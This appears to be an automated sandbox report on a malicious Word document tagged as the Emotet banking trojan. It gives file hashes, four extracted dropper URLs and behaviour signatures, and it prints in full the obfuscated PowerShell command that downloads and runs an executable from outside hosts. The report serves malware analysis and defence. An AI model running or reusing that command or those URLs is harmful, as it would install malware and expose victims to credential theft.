Overview

overview

10

Static

static

8

26de80e3bb...a5.doc

windows7-x64

10

26de80e3bb...a5.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    101s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-09-2024 20:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    26de80e3bbbe1f053da4131ca7a405644b7443356ec97d48517f1ab86d5f1ca5.doc

  • Size

    203KB

  • MD5

    3f27a3e06a8dbeb16ecf0dde173d1924

  • SHA1

    a1a679288523857f1d304a7d4ce08f2c3cfc9a37

  • SHA256

    26de80e3bbbe1f053da4131ca7a405644b7443356ec97d48517f1ab86d5f1ca5

  • SHA512

    923b28f1acf8cac626f683bc98e116ed304b6b8f5e4f38026d955dda3a91829a73d7fcc45c6be19908fb07dc2d173b30e6b2721d14cb58f0271aa3328f557dad

  • SSDEEP

    6144:P8AO4pC8pN7tpTBOI+VHSfXTWMfHaR5f:0AO16ZPTWM/aR

Score
10/10
emotetbankerexecutiontrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://krems-bedachungen.de/fyKDV/
exe.dropper

http://4glory.net/btKzNVlg/
exe.dropper

http://angelabphotography.com/4hR1e/
exe.dropper

http://dekormc.pl/js/ncrILdi/

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\26de80e3bbbe1f053da4131ca7a405644b7443356ec97d48517f1ab86d5f1ca5.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3940
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell (('(Jxu3Jxu+JxuhJxu+JxuRnsJxu+JxuaJxu'+'+JxudJxu+Jxuasd = &(efpnefp+efpJx'+'u+Jxueefp+'+'efJxu+JxupJxu+Jxuw-objeceJxu+'+'JxufJxu+JxupJxu+Jxu+eJxu+J'+'xufptefp) random;3Jxu+JxuhJxu+JxuRYJxu+J'+'xuYJxu+Jx'+'uU =Jxu+Jxu Jxu+Jxu.Jxu+Jxu(Jxu+JxuefpnJxu+JxueJxu+Jxue'+'fp+efJxu+JxupJxu+JxuwJxu+Jx'+'uefpJxu+Jxu+eJxu+Jxufp-objecteJxu+Jxufp) Sy'+'sJxu+Jxutem'+'.Net.WebClJxu+JxuieJxu+JxuntJx'+'u+Jxu;3Jxu+JxuhRJxu+Jx'+'uNJxu+JxuSB = 3Jxu+JxuhRJxu+JxunJxu+JxusadJxu+JxuasdJxu+J'+'xu.neJx'+'u+JxuxJxu+JxutJxu+Jxu(Jxu+Jxu10000Jxu+Jxu,Jx'+'u+Jx'+'u 28213Jxu+Jxu3)Jxu+Jxu;Jxu+Jxu3hRADJxu+Jxu'+'C'+'XJxu+Jxu Jxu+'+'Jx'+'u= '+'ef'+'p http:/Jxu+Jxu/lg'+'lab.Jxu+Jxuco.Jxu+JxuukJxu+Jxu/vsiJxu+Jxu6YDJxu+JxurX/@hJxu+JxuttJxu+Jxup://Jxu+JxukJxu+JxureJxu'+'+JxumJxu+'+'JxusJxu+Jxu-beJxu+JxudaJxu+JxuchungenJxu+Jxu.Jxu+JxudeJxu+Jx'+'u/Jxu+JxufyKDVJxu+Jxu/Jxu+Jxu@http:Jxu+Jx'+'u//4glorJxu+Jxuy.net/bJxu+J'+'xutKzJxu+JxuNVlg/@Jxu+JxuhttpJxu+Jx'+'u://aJxu+JxungelJxu+JxuabphotogJxu+Jxuraph'+'y.Jxu+JxucJxu+JxuomJxu+Jxu/Jxu+Jxu4hJxu+Jxu'+'R1eJxu+Jxu/@htJxu'+'+JxutJxu+Jxup:Jxu+Jxu//dekormJxu+Jxuc.Jxu+JxupJxu+JxulJxu+Jxu/J'+'xu+Jxujs/Jxu+JxuncrJxu+JxuILdiJxu+Jxu/eJxu+Jxufp.SJxu+JxupJxu+Jxulit(efpJxu+Jx'+'u@eJxu+Jxufp);Jxu+Jxu3hRSDC = 3Jxu+JxuhRenvJxu'+'+Jxu:publiJxu+JxucJ'+'xu+Jxu + efJxu+'+'Jxup7FMJxu+J'+'xuefpJxu+Jxu + Jxu+Jxu3hRN'+'SB Jxu+Jxu+Jxu+Jxu'+' (Jxu+JxuefpJxu+Jxu.exefp+Jxu+JxueJxu+JxufJ'+'xu+JxupeJxu+JxuefJxu+Jxup);foJxu+JxurJxu+JxueacJxu+Jxuh(Jxu+Jxu3hRasfc iJxu+JxunJxu+Jxu 3hJxu+JxuRADJxu+'+'JxuCX)Jxu+Jxu{Jx'+'u+JxutJxu+Jxur'+'Jxu+Jxuy{3hRYYU.EJxu+JxuLBJxu+JxuDoJx'+'u+JxuTY0W'+'nlT'+'Y0OadFITJxu+JxuYJxu+Jxu0lJxu+JxueEJxu+JxuLJxu+JxuB(3hRasfc.E'+'LBToStJxu+JxurTJxu+JxuYJxu+Jxu0Jxu+JxuiTJxu+JxuYJxu+Jxu0NgELJxu+JxuBJxu+Jxu()Jxu+Jxu, 3Jxu+JxuhRSDC);&(efpInvJxu+JxuoefpJxu+Jxu+efpkeJxu+'+'Jxuf'+'p+efp'+'e-It'+'emeJxu+JxufpJxu+'+'Jxu)Jxu+Jxu(3hJxu+JxuRSJx'+'u+JxuDCJxu+Jxu);breakJxu+Jxu;Jxu+Jxu}catch{}Jxu+Jxu}Jxu).R'+'EpLACe(Jxu7FMJxu,JxuD2cJxu).REpLACe(JxuefpJxu,[STRinG][Char]39).REpLACe('+'Jxu3h'+'RJxu,Jxus'+'uKJxu).REpLACe(JxuELBJxu,[STRinG][Char]34).REpLACe(JxuTY0Jxu,[STRinG][Char]96) tMo. ( suKPshOme[4]+suKPSHoMe[30]+JxuxJxu)')-CreplaCE 'tMo',[cHar]124-CreplaCE 'Jxu',[cHar]39-rEPlAcE 'suK',[cHar]36 -rEPlAcE ([cHar]68+[cHar]50+[cHar]99),[cHar]92) |.( $SHELLID[1]+$sHELlID[13]+'X')
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2676

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD9679.tmp\sist02.xsl
    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a2112fhu.gaj.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
    Filesize

    18KB

    MD5

    1772a540529c514753aa03f729c73c54

    SHA1

    e78ad007dac5cf318ab22eeacbc203c1af91b355

    SHA256

    015512fb64374a282168344911853f689c700ad32f5669f481ce33e9e307af86

    SHA512

    b18b23ea5d31f185696c7d443fea1379de3193ef279e2357614642a6228f65689ca60ca976c9d4042a502d53414bf33bccb7978c2739b6f4b88507b4d3859e34

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
    Filesize

    2B

    MD5

    f3b25701fe362ec84616a93a45ce9998

    SHA1

    d62636d8caec13f04e28442a0a6fa1afeb024bbb

    SHA256

    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

    SHA512

    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    Download Submit

  • memory/2676-195-0x00000208FFE90000-0x00000208FFEB2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3940-16-0x00007FFA83890000-0x00007FFA838A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3940-7-0x00007FFAC5870000-0x00007FFAC5A65000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3940-8-0x00007FFA858F0000-0x00007FFA85900000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3940-5-0x00007FFA858F0000-0x00007FFA85900000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3940-9-0x00007FFAC5870000-0x00007FFAC5A65000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3940-11-0x00007FFAC5870000-0x00007FFAC5A65000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3940-10-0x00007FFAC5870000-0x00007FFAC5A65000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3940-12-0x00007FFA83890000-0x00007FFA838A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3940-14-0x00007FFAC5870000-0x00007FFAC5A65000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3940-15-0x00007FFAC5870000-0x00007FFAC5A65000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3940-13-0x00007FFAC5870000-0x00007FFAC5A65000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3940-1-0x00007FFAC590D000-0x00007FFAC590E000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3940-69-0x00007FFAC5870000-0x00007FFAC5A65000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3940-6-0x00007FFAC5870000-0x00007FFAC5A65000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3940-4-0x00007FFAC5870000-0x00007FFAC5A65000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3940-2-0x00007FFA858F0000-0x00007FFA85900000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3940-222-0x00007FFAC5870000-0x00007FFAC5A65000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3940-223-0x00007FFAC590D000-0x00007FFAC590E000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3940-224-0x00007FFAC5870000-0x00007FFAC5A65000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3940-225-0x00007FFAC5870000-0x00007FFAC5A65000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3940-231-0x00007FFAC5870000-0x00007FFAC5A65000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3940-3-0x00007FFA858F0000-0x00007FFA85900000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3940-0-0x00007FFA858F0000-0x00007FFA85900000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3940-733-0x00007FFA858F0000-0x00007FFA85900000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3940-734-0x00007FFA858F0000-0x00007FFA85900000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3940-732-0x00007FFA858F0000-0x00007FFA85900000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3940-731-0x00007FFA858F0000-0x00007FFA85900000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3940-735-0x00007FFAC5870000-0x00007FFAC5A65000-memory.dmp

    Filesize

    2.0MB

    Download